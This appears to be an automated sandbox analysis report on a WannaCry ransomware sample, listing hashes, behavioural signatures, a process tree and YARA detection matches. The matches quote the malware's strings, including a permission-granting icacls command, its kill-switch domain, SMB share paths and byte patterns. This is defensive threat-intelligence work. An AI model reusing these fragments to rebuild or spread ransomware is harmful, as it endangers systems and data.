Edit tour

Windows Analysis Report
stN592INV6.exe

Overview

General Information

Sample Name:	stN592INV6.exe
Original Sample Name:	2023-05-07_31510bd9b6f5c297c64492ab86aacaa1_wannacry.exe
Analysis ID:	860906
MD5:	31510bd9b6f5c297c64492ab86aacaa1
SHA1:	95f2b6d6fa1c48d71d2154270ba77aa3af74adc1
SHA256:	011c24bce46c2ded7236482e0e36530dd27c937e31a0896e91659d9acd7ceb69
Infos:

Detection

Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Yara detected Wannacry ransomware

Antivirus / Scanner detection for submitted sample

Tries to download HTTP data from a sinkholed server

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for sample

Connects to many IPs within the same subnet mask (likely port scanning)

Connects to many different private IPs (likely to spread or exploit)

Machine Learning detection for dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Connects to many different private IPs via SMB (likely to spread or exploit)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Creates a DirectInput object (often for capturing keystrokes)

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Connects to several IPs in different countries

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

stN592INV6.exe (PID: 7116 cmdline: C:\Users\user\Desktop\stN592INV6.exe MD5: 31510BD9B6F5C297C64492AB86AACAA1)

tasksche.exe (PID: 2396 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)

stN592INV6.exe (PID: 6052 cmdline: C:\Users\user\Desktop\stN592INV6.exe -m security MD5: 31510BD9B6F5C297C64492AB86AACAA1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
stN592INV6.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xe048:$x7: mssecsvc.exe 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0xe034:$s1: C:\%s\%s 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
stN592INV6.exe	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
stN592INV6.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
stN592INV6.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
stN592INV6.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\tasksche.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
C:\Windows\tasksche.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Windows\tasksche.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\tasksche.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000000.353120233.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32600:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32628:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32e44:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32e6c:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: stN592INV6.exe PID: 7116	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: stN592INV6.exe PID: 6052	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.stN592INV6.exe.1fe70a4.4.raw.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.stN592INV6.exe.1fdc084.5.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.stN592INV6.exe.25078e8.7.raw.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.stN592INV6.exe.24fc8c8.9.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.stN592INV6.exe.250b948.8.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x22357:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.250b948.8.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
1.2.stN592INV6.exe.250b948.8.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.250b948.8.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.stN592INV6.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.stN592INV6.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.stN592INV6.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.stN592INV6.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.stN592INV6.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
0.0.stN592INV6.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.stN592INV6.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.stN592INV6.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 